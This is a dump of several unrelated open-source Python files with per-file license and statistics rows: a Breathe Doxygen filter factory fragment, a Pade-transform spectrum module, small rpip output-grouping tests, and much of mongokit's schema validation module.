NotFilter(
# Ignore compounddefs which are from another file
# (normally means classes and structs which are in a
# namespace that we have other interests in) but only
# check it if the compounddef is not a namespace
# itself, as for some reason compounddefs for
# namespaces are registered with just a single file
# location even if they namespace is spread over
# multiple files
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compounddef"]),
NotFilter(InFilter(KindAccessor(Node()), ["namespace"])),
NotFilter(
FilePathFilter(LambdaAccessor(Node(), lambda x: x.location),
filename, self.path_handler)
)
)
)
)
return AndFilter(
self.create_outline_filter(options),
filter_
)
def create_content_filter(self, kind, options):
"""Returns a filter which matches the contents of the or namespace but not the group or
namepace name or description.
This allows the groups to be used to structure sections of the documentation rather than to
structure and further document groups of documentation
As a finder/content filter we only need to match exactly what we're interested in.
"""
if kind not in ['group', 'namespace']:
raise UnrecognisedKindError(kind)
node = Node()
# Filter for public memberdefs
node_is_memberdef = node.node_type == 'memberdef'
node_is_public = node.prot == 'public'
public_members = node_is_memberdef & node_is_public
# Filter for public innerclasses
parent = Parent()
parent_is_compounddef = parent.node_type == 'compounddef'
parent_is_class = parent.kind == kind
node_is_innerclass = (node.node_type == "ref") & (node.node_name == "innerclass")
node_is_public = node.prot == 'public'
public_innerclass = parent_is_compounddef & parent_is_class \
& node_is_innerclass & node_is_public
return public_members | public_innerclass
def create_index_filter(self, options):
filter_ = AndFilter(
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(NodeTypeAccessor(Node()), ["ref"]),
InFilter(NodeNameAccessor(Node()), ["innerclass", "innernamespace"])
)
),
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(KindAccessor(Parent()), ["group"]),
InFilter(NodeTypeAccessor(Node()), ["sectiondef"]),
InFilter(KindAccessor(Node()), ["func"])
)
)
)
return AndFilter(
self.create_outline_filter(options),
filter_
)
def create_open_filter(self):
"""Returns a completely open filter which matches everything"""
return OpenFilter()
def create_id_filter(self, node_type, refid):
node = Node()
return (node.node_type == node_type) & (node.id == refid)
def create_file_finder_filter(self, filename):
filter_ = AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compounddef"]),
InFilter(KindAccessor(Node()), ["file"]),
FilePathFilter(LambdaAccessor(Node(), lambda x: x.location), filename,
self.path_handler)
)
return filter_
def create_member_finder_filter(self, namespace, name, kind):
"""Returns a filter which looks for a member with the specified name and kind."""
node = Node()
parent = Parent()
node_matches = (node.node_type == 'member') \
& (node.kind == kind) \
& (node.name == name)
if namespace:
parent_matches = (parent.node_type == 'compound') \
& ((parent.kind == 'namespace') | (parent.kind == 'class')) \
& (parent.name == namespace)
return parent_matches & node_matches
else:
is_implementation_file = parent.name.endswith(self.implementation_filename_extensions)
parent_is_compound = parent.node_type == 'compound'
parent_is_file = (parent.kind == 'file') & (~ is_implementation_file)
parent_is_not_file = parent.kind != 'file'
return (parent_is_compound & parent_is_file & node_matches) \
| (parent_is_compound & parent_is_not_file & node_matches)
def create_function_finder_filter(self, namespace, name):
parent = Parent()
parent_is_compound = parent.node_type == 'compound'
parent_is_group = parent.kind == 'group'
function_filter = self.create_member_finder_filter(namespace, name, 'function')
# Get matching functions but only ones where the parent is not a group. We want to skip
# function entries in groups as we'll find the same functions in a file's xml output
# elsewhere and having more than one match is confusing for our logic later on.
return function_filter & ~(parent_is_compound & parent_is_group)
def create_enumvalue_finder_filter(self, name):
"""Returns a filter which looks for an enumvalue with the specified name."""
node = Node()
return (node.node_type == 'enumvalue') & (node.name == name)
def create_compound_finder_filter(self, name, kind):
"""Returns a filter which looks for a compound with the specified name and kind."""
node = Node()
return (node.node_type == 'compound') & (node.kind == kind) & (node.name == name)
def create_finder_filter(self, kind, name):
"""Returns a filter which looks for the compound node from the index which is a group node
(kind=group) and has the appropriate name
The compound node should reference the group file which we can parse for the group
contents.
"""
if kind == 'group':
filter_ = AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
InFilter(NameAccessor(Node()), [name])
)
else:
# Assume kind == 'namespace'
filter_ = AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["namespace"]),
InFilter(NameAccessor(Node()), [name])
)
return filter_
def get_config_values(self, app):
"""Extract the breathe_default_members config value and store it.
This method is called on the 'builder-init' event in Sphinx"""
self.default_members = app.config.breathe_default_members
self.implementation_filename_extensions = \
app.config.breathe_implementation_filename_extensions
| bsd-3-clause | -4,144,635,030,783,446,500 | 32.336275 | 100 | 0.610988 | false |
jjgoings/McMurchie-Davidson | mmd/utils/spectrum.py | 1 | 3029 | from __future__ import division
import numpy as np
"""Contains some routines to do the (Pade approximant) Fourier transform
as well as some peak-finding routines, useful for post processing a
real-time calculation
"""
def genSpectra(time,dipole,signal):
fw, frequency = pade(time,dipole)
fw_sig, frequency = pade(time,signal)
numerator = np.imag(fw)
denominator = np.abs(fw_sig)
spectra = ((4.0*27.21138602*2*frequency*np.pi*(numerator))/(3.0*137.036*denominator))
return frequency, spectra
def pade(time,dipole):
damp_const = 50.0
dipole = np.asarray(dipole) - dipole[0]
stepsize = time[1] - time[0]
damp = np.exp(-(stepsize*np.arange(len(dipole)))/float(damp_const))
dipole *= damp
M = len(dipole)
N = int(np.floor(M / 2))
num_pts = 20000
if N > num_pts:
N = num_pts
# G and d are (N-1) x (N-1)
# d[k] = -dipole[N+k] for k in range(1,N)
d = -dipole[N+1:2*N]
try:
from scipy.linalg import toeplitz, solve_toeplitz
except ImportError:
print("You'll need SciPy version >= 0.17.0")
try:
# Instead, form G = (c,r) as toeplitz
#c = dipole[N:2*N-1]
#r = np.hstack((dipole[1],dipole[N-1:1:-1]))
b = solve_toeplitz((dipole[N:2*N-1],\
np.hstack((dipole[1],dipole[N-1:1:-1]))),d,check_finite=False)
except np.linalg.linalg.LinAlgError:
# OLD CODE: sometimes more stable
# G[k,m] = dipole[N - m + k] for m,k in range(1,N)
G = dipole[N + np.arange(1,N)[:,None] - np.arange(1,N)]
b = np.linalg.solve(G,d)
# Now make b Nx1 where b0 = 1
b = np.hstack((1,b))
# b[m]*dipole[k-m] for k in range(0,N), for m in range(k)
a = np.dot(np.tril(toeplitz(dipole[0:N])),b)
p = np.poly1d(a)
q = np.poly1d(b)
# If you want energies greater than 2*27.2114 eV, you'll need to change
# the default frequency range to something greater.
frequency = np.arange(0.00,2.0,0.0001)
W = np.exp(-1j*frequency*stepsize)
fw = p(W)/q(W)
return fw, frequency
def peaks(spectra,frequency,number=3,thresh=0.01):
""" Return the peaks from the Fourier transform
Variables:
number: integer. number of peaks to print.
thresh: float. Threshhold intensity for printing.
Returns: Energy (eV), Intensity (depends on type of spectra)
"""
from scipy.signal import argrelextrema as pks
# find all peak indices [idx], and remove those below thresh [jdx]
idx = pks(np.abs(spectra),np.greater,order=3)
jdx = np.where((np.abs(spectra[idx]) >= thresh))
kdx = idx[0][jdx[0]] # indices of peaks matching criteria
if number > len(kdx):
number = len(kdx)
print("First "+str(number)+" peaks (eV) found: ")
for i in xrange(number):
print("{0:.4f}".format(frequency[kdx][i]*27.2114),
"{0:.4f}".format(spectra[kdx][i]))
| bsd-3-clause | -264,727,656,188,925,760 | 29.908163 | 89 | 0.584021 | false |
danielfrg/remote-pip | rpip/tests/test_output.py | 1 | 1204 | from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
| apache-2.0 | 3,832,086,671,021,986,300 | 22.607843 | 57 | 0.575581 | false |
namlook/mongokit | mongokit/schema_document.py | 1 | 42677 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2011, Nicolas Clairon
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the University of California, Berkeley nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE REGENTS AND CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import bson
import datetime
import logging
from copy import deepcopy
log = logging.getLogger(__name__)
from mongokit.operators import SchemaOperator, IS
from mongokit.helpers import DotCollapsedDict
from mongokit.helpers import DotExpandedDict
from mongokit.helpers import i18nDotedDict
from mongokit.helpers import DotedDict
__all__ = [
'AuthorizedTypeError',
'BadKeyError',
'CustomType',
'DefaultFieldTypeError',
'DotCollapsedDict',
'DotedDict',
'DotExpandedDict',
'DuplicateDefaultValueError',
'DuplicateRequiredError',
'i18n',
'i18nError',
'ModifierOperatorError',
'RequireFieldError',
'SchemaDocument',
'SchemaDocumentError',
'SchemaProperties',
'SchemaTypeError',
'Set',
'StructureError',
'ValidationError',
]
class CustomType(object):
init_type = None
mongo_type = None
python_type = None
def __init__(self):
if self.mongo_type is None:
raise TypeError("`mongo_type` property must be specify in %s" %
self.__class__.__name__)
if self.python_type is None:
raise TypeError("`python_type` property must be specify in %s" %
self.__class__.__name__)
def to_bson(self, value):
"""convert type to a mongodb type"""
raise NotImplementedError
def to_python(self, value):
"""convert type to a mongodb type"""
raise NotImplementedError
def validate(self, value, path):
"""
This method is optional. It add a validation layer.
This method is been called in Document.validate()
value: the value of the field
path: the field name (ie, 'foo' or 'foo.bar' if nested)
"""
pass
# field wich does not need to be declared into the structure
STRUCTURE_KEYWORDS = []
class SchemaDocumentError(Exception):
pass
class RequireFieldError(SchemaDocumentError):
pass
class StructureError(SchemaDocumentError):
pass
class BadKeyError(SchemaDocumentError):
pass
class AuthorizedTypeError(SchemaDocumentError):
pass
class ValidationError(SchemaDocumentError):
pass
class DuplicateRequiredError(SchemaDocumentError):
pass
class DuplicateDefaultValueError(SchemaDocumentError):
pass
class ModifierOperatorError(SchemaDocumentError):
pass
class SchemaTypeError(SchemaDocumentError):
pass
class DefaultFieldTypeError(SchemaDocumentError):
pass
class i18nError(SchemaDocumentError):
pass
class DeprecationError(Exception):
pass
class DuplicateI18nError(Exception):
pass
class SchemaProperties(type):
def __new__(mcs, name, bases, attrs):
attrs['_protected_field_names'] = set(
['_protected_field_names', '_namespaces', '_required_namespace'])
for base in bases:
parent = base.__mro__[0]
if not hasattr(parent, 'structure'):
continue
if parent.structure is not None:
#parent = parent()
if parent.structure:
if 'structure' not in attrs and parent.structure:
attrs['structure'] = parent.structure.copy()
else:
obj_structure = attrs.get('structure', {}).copy()
attrs['structure'] = parent.structure.copy()
attrs['structure'].update(obj_structure)
if parent.required_fields:
attrs['required_fields'] = list(set(
attrs.get('required_fields', [])+parent.required_fields))
if parent.default_values:
obj_default_values = attrs.get('default_values', {}).copy()
attrs['default_values'] = parent.default_values.copy()
attrs['default_values'].update(obj_default_values)
if parent.validators:
obj_validators = attrs.get('validators', {}).copy()
attrs['validators'] = parent.validators.copy()
attrs['validators'].update(obj_validators)
if parent.i18n:
attrs['i18n'] = list(set(
attrs.get('i18n', [])+parent.i18n))
if attrs.get('authorized_types'):
attrs['authorized_types'] = list(set(parent.authorized_types).union(set(attrs['authorized_types'])))
for mro in bases[0].__mro__:
attrs['_protected_field_names'] = attrs['_protected_field_names'].union(list(mro.__dict__))
attrs['_protected_field_names'] = list(attrs['_protected_field_names'])
if attrs.get('structure') and name not in \
["SchemaDocument", "Document", "VersionedDocument", "RevisionDocument"]:
base = bases[0]
if not attrs.get('authorized_types'):
attrs['authorized_types'] = base.authorized_types
base._validate_structure(attrs['structure'], name, attrs.get('authorized_types'))
attrs['_namespaces'] = list(base._SchemaDocument__walk_dict(attrs['structure']))
if [1 for i in attrs['_namespaces'] if type(i) is type]:
raise DeprecationError("%s: types are not allowed as structure key anymore" % name)
mcs._validate_descriptors(attrs)
## building required fields namespace
attrs['_required_namespace'] = set([])
for rf in attrs.get('required_fields', []):
splited_rf = rf.split('.')
for index in range(len(splited_rf)):
attrs['_required_namespace'].add(".".join(splited_rf[:index+1]))
attrs['_collapsed_struct'] = DotCollapsedDict(attrs['structure'], remove_under_type=True)
elif attrs.get('structure') is not None and name not in \
["SchemaDocument", "Document", "VersionedDocument", "RevisionDocument"]:
attrs['_collapsed_struct'] = {}
attrs['_i18n_namespace'] = []
if attrs.get('i18n'):
attrs['_i18n_namespace'] = set(['.'.join(i.split('.')[:-1]) for i in attrs['i18n']])
return type.__new__(mcs, name, bases, attrs)
@classmethod
def _validate_descriptors(mcs, attrs):
# TODO i18n validator
for dv in attrs.get('default_values', {}):
if not dv in attrs['_namespaces']:
raise ValueError("Error in default_values: can't find %s in structure" % dv)
for required in attrs.get('required_fields', []):
if required not in attrs['_namespaces']:
raise ValueError("Error in required_fields: can't find %s in structure" % required)
for validator in attrs.get('validators', {}):
if validator not in attrs['_namespaces']:
raise ValueError("Error in validators: can't find %s in structure" % validator)
# required_field
if attrs.get('required_fields'):
if len(attrs['required_fields']) != len(set(attrs['required_fields'])):
raise DuplicateRequiredError("duplicate required_fields : %s" % attrs['required_fields'])
# i18n
if attrs.get('i18n'):
if len(attrs['i18n']) != len(set(attrs['i18n'])):
raise DuplicateI18nError("duplicated i18n : %s" % attrs['i18n'])
for _i18n in attrs['i18n']:
if _i18n not in attrs['_namespaces']:
raise ValueError("Error in i18n: can't find {} in structure".format(_i18n))
class SchemaDocument(dict):
"""
A SchemaDocument is dictionary with a building structured schema
The validate method will check that the document match the underling
structure. A structure must be specify in each SchemaDocument.
>>> class TestDoc(SchemaDocument):
... structure = {
... "foo":unicode,
... "bar":int,
... "nested":{
... "bla":float}}
`unicode`, `int`, `float` are python types listed in `mongokit.authorized_types`.
>>> doc = TestDoc()
>>> doc
{'foo': None, 'bar': None, 'nested': {'bla': None}}
A SchemaDocument works just like dict:
>>> doc['bar'] = 3
>>> doc['foo'] = "test"
We can describe fields as required with the required attribute:
>>> TestDoc.required_fields = ['bar', 'nested.bla']
>>> doc = TestDoc()
>>> doc['bar'] = 2
Validation is made with the `validate()` method:
>>> doc.validate() # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
RequireFieldError: nested.bla is required
Default values can be set by using the attribute default_values :
>>> TestDoc.default_values = {"bar":3, "nested.bla":2.0}
>>> doc = TestDoc()
>>> doc
{'foo': None, 'bar': 3, 'nested': {'bla': 2.0}}
>>> doc.validate()
Validators can be added in order to validate some values :
>>> TestDoc.validators = {"bar":lambda x: x>0, "nested.bla": lambda x: x<0}
>>> doc = TestDoc()
>>> doc['bar'] = 3
>>> doc['nested']['bla'] = 2.0
>>> doc.validate()
Traceback (most recent call last):
...
ValidationError: nested.bla does not pass the validator <lambda>
If you want to use the dot notation (ala json), you must set the
`use_dot_notation` attribute to True:
>>> class TestDotNotation(SchemaDocument):
... structure = {
... "foo":{ "bar":unicode}
... }
... use_dot_notation=True
>>> doc = TestDotNotation()
>>> doc.foo.bar = u"bla"
>>> doc
{"foo":{"bar":u"bla}}
"""
__metaclass__ = SchemaProperties
structure = None
required_fields = []
default_values = {}
validators = {}
i18n = []
raise_validation_errors = True
skip_validation = False
# if you want to have all schemaless benefits (default False but should change)
# warning, if use_schemaless is True, Migration features can not be used.
use_schemaless = False
# If you want to use the dot notation, set this to True:
use_dot_notation = False
dot_notation_warning = False
authorized_types = [
type(None),
bool,
int,
long,
float,
unicode,
basestring,
list,
dict,
datetime.datetime,
bson.binary.Binary,
CustomType,
]
def __init__(self, doc=None, gen_skel=True, _gen_auth_types=True, _validate=True, lang='en', fallback_lang='en'):
"""
doc : a dictionary
gen_skel : if True, generate automatically the skeleton of the doc
filled with NoneType each time validate() is called. Note that
if doc is not {}, gen_skel is always False. If gen_skel is False,
default_values cannot be filled.
gen_auth_types: if True, generate automatically the self.authorized_types
attribute from self.authorized_types
"""
super(SchemaDocument, self).__init__()
if self.structure is None:
self.structure = {}
self._current_lang = lang
self._fallback_lang = fallback_lang
self.validation_errors = {}
# init
if doc:
for k, v in doc.iteritems():
self[k] = v
gen_skel = False
if gen_skel:
self.generate_skeleton()
if self.default_values:
self._set_default_fields(self, self.structure)
else:
self._process_custom_type('python', self, self.structure)
if self.use_dot_notation:
self.__generate_doted_dict(self, self.structure)
if self.i18n:
self._make_i18n()
def generate_skeleton(self):
"""
validate and generate the skeleton of the document
from the structure (unknown values are set to None)
"""
self.__generate_skeleton(self, self.structure)
def validate(self):
"""
validate the document.
This method will verify if :
* the doc follow the structure,
* all required fields are filled
Additionally, this method will process all
validators.
"""
if self.validators:
self._process_validators(self, self.structure)
self._process_custom_type('bson', self, self.structure)
self._validate_doc(self, self.structure)
self._process_custom_type('python', self, self.structure)
if self.required_fields:
self._validate_required(self, self.structure)
def __setattr__(self, key, value):
if key not in self._protected_field_names and self.use_dot_notation and key in self:
if isinstance(self.structure[key], i18n):
self[key][self._current_lang] = value
else:
self[key] = value
else:
if self.dot_notation_warning and not key.startswith('_') and key not in \
['db', 'collection', 'versioning_collection', 'connection', 'fs']:
log.warning("dot notation: {} was not found in structure. Add it as attribute instead".format(key))
dict.__setattr__(self, key, value)
def __getattr__(self, key):
if key not in self._protected_field_names and self.use_dot_notation and key in self:
if isinstance(self[key], i18n):
if self._current_lang not in self[key]:
return self[key].get(self._fallback_lang)
return self[key][self._current_lang]
return self[key]
else:
return dict.__getattribute__(self, key)
#
# Public API end
#
@classmethod
def __walk_dict(cls, dic):
# thanks jean_b for the patch
for key, value in dic.items():
if isinstance(value, dict) and len(value):
if type(key) is type:
yield '$%s' % key.__name__
else:
yield key
for child_key in cls.__walk_dict(value):
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
#if type(child_key) is type:
# new_child_key = "$%s" % child_key.__name__
#else:
if type(child_key) is not type:
new_child_key = child_key
yield '%s.%s' % (new_key, new_child_key)
elif type(key) is type:
yield '$%s' % key.__name__
# elif isinstance(value, list) and len(value):
# if isinstance(value[0], dict):
# for child_key in cls.__walk_dict(value[0]):
# #if type(key) is type:
# # new_key = "$%s" % key.__name__
# #else:
# if type(key) is not type:
# new_key = key
# #if type(child_key) is type:
# # new_child_key = "$%s" % child_key.__name__
# #else:
# if type(child_key) is not type:
# new_child_key = child_key
# yield '%s.%s' % (new_key, new_child_key)
# else:
# if type(key) is not type:
# yield key
# #else:
# # yield ""
else:
if type(key) is not type:
yield key
#else:
# yield ""
@classmethod
def _validate_structure(cls, structure, name, authorized_types):
"""
validate if all fields in self.structure are in authorized types.
"""
##############
def __validate_structure(struct, name, _authorized):
if type(struct) is type:
if struct not in authorized_types:
if struct not in authorized_types:
raise StructureError("%s: %s is not an authorized type" % (name, struct))
elif isinstance(struct, dict):
for key in struct:
if isinstance(key, basestring):
if "." in key:
raise BadKeyError("%s: %s must not contain '.'" % (name, key))
if key.startswith('$'):
raise BadKeyError("%s: %s must not start with '$'" % (name, key))
elif type(key) is type:
if not key in authorized_types:
raise AuthorizedTypeError("%s: %s is not an authorized type" % (name, key))
else:
raise StructureError("%s: %s must be a basestring or a type" % (name, key))
if struct[key] is None:
pass
elif isinstance(struct[key], dict):
__validate_structure(struct[key], name, authorized_types)
elif isinstance(struct[key], list):
__validate_structure(struct[key], name, authorized_types)
elif isinstance(struct[key], tuple):
__validate_structure(struct[key], name, authorized_types)
elif isinstance(struct[key], CustomType):
__validate_structure(struct[key].mongo_type, name, authorized_types)
elif isinstance(struct[key], SchemaProperties):
pass
elif isinstance(struct[key], SchemaOperator):
__validate_structure(struct[key], name, authorized_types)
elif hasattr(struct[key], 'structure'):
__validate_structure(struct[key], name, authorized_types)
elif struct[key] not in authorized_types:
ok = False
for auth_type in authorized_types:
if struct[key] is None:
ok = True
else:
try:
if isinstance(struct[key], auth_type) or issubclass(struct[key], auth_type):
ok = True
except TypeError:
raise TypeError("%s: %s is not a type" % (name, struct[key]))
if not ok:
raise StructureError(
"%s: %s is not an authorized type" % (name, struct[key]))
elif isinstance(struct, list) or isinstance(struct, tuple):
for item in struct:
__validate_structure(item, name, authorized_types)
elif isinstance(struct, SchemaOperator):
if isinstance(struct, IS):
for operand in struct:
if type(operand) not in authorized_types:
raise StructureError("%s: %s in %s is not an authorized type (%s found)" % (
name, operand, struct, type(operand).__name__))
else:
for operand in struct:
if operand not in authorized_types:
raise StructureError("%s: %s in %s is not an authorized type (%s found)" % (
name, operand, struct, type(operand).__name__))
elif isinstance(struct, SchemaProperties):
pass
else:
ok = False
for auth_type in authorized_types:
if isinstance(struct, auth_type):
ok = True
if not ok:
raise StructureError("%s: %s is not an authorized_types" % (name, struct))
#################
if structure is None:
raise StructureError("%s.structure must not be None" % name)
if not isinstance(structure, dict):
raise StructureError("%s.structure must be a dict instance" % name)
__validate_structure(structure, name, authorized_types)
def _raise_exception(self, exception, field, message):
if self.raise_validation_errors:
raise exception(message)
else:
if not field in self.validation_errors:
self.validation_errors[field] = []
self.validation_errors[field].append(exception(message))
def _validate_doc(self, doc, struct, path=""):
"""
check if doc field types match the doc field structure
"""
if type(struct) is type or struct is None:
if struct is None:
if type(doc) not in self.authorized_types:
self._raise_exception(AuthorizedTypeError, type(doc).__name__,
"%s is not an authorized types" % type(doc).__name__)
elif not isinstance(doc, struct) and doc is not None:
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (
path, struct.__name__, type(doc).__name__))
elif isinstance(struct, CustomType):
if not isinstance(doc, struct.mongo_type) and doc is not None:
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (
path, struct.mongo_type.__name__, type(doc).__name__))
struct.validate(doc, path=path)
elif isinstance(struct, SchemaOperator):
if not struct.validate(doc) and doc is not None:
if isinstance(struct, IS):
self._raise_exception(SchemaTypeError, path,
"%s must be in %s not %s" % (path, struct._operands, doc))
else:
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (path, struct, type(doc).__name__))
elif isinstance(struct, dict):
if not isinstance(doc, type(struct)):
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (
path, type(struct).__name__, type(doc).__name__))
struct_length = len(struct) if not '_id' in struct else len(struct) - 1
if len(doc) != struct_length:
struct_doc_diff = list(set(struct).difference(set(doc)))
if struct_doc_diff:
for field in struct_doc_diff:
if (type(field) is not type) and (not self.use_schemaless):
self._raise_exception(StructureError, None,
"missed fields %s in %s" % (struct_doc_diff, type(doc).__name__))
else:
struct_struct_diff = list(set(doc).difference(set(struct)))
bad_fields = [s for s in struct_struct_diff if s not in STRUCTURE_KEYWORDS]
if bad_fields and not self.use_schemaless:
self._raise_exception(StructureError, None,
"unknown fields %s in %s" % (bad_fields, type(doc).__name__))
for key in struct:
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
if new_key.split('.')[-1].startswith("$"):
for doc_key in doc:
if not isinstance(doc_key, key):
self._raise_exception(SchemaTypeError, path,
"key of %s must be an instance of %s not %s" % (
path, key.__name__, type(doc_key).__name__))
self._validate_doc(doc[doc_key], struct[key], new_path)
else:
if key in doc:
self._validate_doc(doc[key], struct[key], new_path)
elif isinstance(struct, list):
if not isinstance(doc, list) and not isinstance(doc, tuple):
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of list not %s" % (path, type(doc).__name__))
if not len(struct):
struct = None
else:
struct = struct[0]
for obj in doc:
self._validate_doc(obj, struct, path)
elif isinstance(struct, tuple):
if not isinstance(doc, list) and not isinstance(doc, tuple):
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of list not %s" % (
path, type(doc).__name__))
if len(doc) != len(struct):
self._raise_exception(SchemaTypeError, path, "%s must have %s items not %s" % (
path, len(struct), len(doc)))
for i in range(len(struct)):
self._validate_doc(doc[i], struct[i], path)
def _process_validators(self, doc, _struct, _path=""):
doted_doc = DotCollapsedDict(doc)
for key, validators in self.validators.iteritems():
if key in doted_doc and doted_doc[key] is not None:
if not hasattr(validators, "__iter__"):
validators = [validators]
for validator in validators:
try:
if not validator(doted_doc[key]):
raise ValidationError("%s does not pass the validator " + validator.__name__)
except Exception, e:
self._raise_exception(ValidationError, key,
unicode(e) % key)
def _process_custom_type(self, target, doc, struct, path="", root_path=""):
for key in struct:
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
#
# if the value is a dict, we have a another structure to validate
#
#
# It is not a dict nor a list but a simple key:value
#
if isinstance(struct[key], CustomType):
if target == 'bson':
if key in doc:
if struct[key].python_type is not None:
if not isinstance(doc[key], struct[key].python_type) and doc[key] is not None:
self._raise_exception(SchemaTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key].python_type.__name__,
type(doc[key]).__name__))
doc[key] = struct[key].to_bson(doc[key])
else:
if key in doc:
doc[key] = struct[key].to_python(doc[key])
elif isinstance(struct[key], dict):
if doc: # we don't need to process an empty doc
if type(key) is type:
for doc_key in doc: # process type's key such {unicode:int}...
self._process_custom_type(target, doc[doc_key], struct[key], new_path, root_path)
else:
if key in doc: # we don't care about missing fields
self._process_custom_type(target, doc[key], struct[key], new_path, root_path)
#
# If the struct is a list, we have to validate all values into it
#
elif type(struct[key]) is list:
#
# check if the list must not be null
#
if struct[key]:
l_objs = []
if isinstance(struct[key][0], CustomType):
for obj in doc[key]:
if target == 'bson':
if struct[key][0].python_type is not None:
if not isinstance(obj, struct[key][0].python_type) and obj is not None:
self._raise_exception(SchemaTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key][0].python_type.__name__,
type(obj).__name__))
obj = struct[key][0].to_bson(obj)
else:
obj = struct[key][0].to_python(obj)
l_objs.append(obj)
doc[key] = l_objs
elif isinstance(struct[key][0], dict):
if doc.get(key):
for obj in doc[key]:
self._process_custom_type(target, obj, struct[key][0], new_path, root_path)
def _set_default_fields(self, doc, struct, path=""):
# TODO check this out, this method must be restructured
for key in struct:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
#
# default_values :
# if the value is None, check if a default value exist.
# if exists, and it is a function then call it otherwise,
# juste feed it
#
if type(key) is not type:
if doc[key] is None and new_path in self.default_values:
new_value = self.default_values[new_path]
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
if isinstance(struct[key], CustomType):
if not isinstance(new_value, struct[key].python_type):
self._raise_exception(DefaultFieldTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key].python_type.__name__,
type(new_value).__name__))
doc[key] = new_value
#
# if the value is a dict, we have a another structure to validate
#
if isinstance(struct[key], dict) and new_path not in self.i18n:
#
# if the dict is still empty into the document we build
# it with None values
#
if len(struct[key]) and not [i for i in struct[key].keys() if type(i) is type]:
self._set_default_fields(doc[key], struct[key], new_path)
else:
if new_path in self.default_values:
new_value = self.default_values[new_path]
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
doc[key] = new_value
elif isinstance(struct[key], list):
if new_path in self.default_values:
for new_value in self.default_values[new_path]:
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
if isinstance(struct[key][0], CustomType):
if not isinstance(new_value, struct[key][0].python_type):
self._raise_exception(DefaultFieldTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key][0].python_type.__name__,
type(new_value).__name__))
doc[key].append(new_value)
else: # what else
if new_path in self.default_values:
new_value = self.default_values[new_path]
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
if new_path in self.i18n:
doc[key] = i18n(
field_type=struct[key],
field_name=key
)
doc[key].update(new_value)
else:
doc[key] = new_value
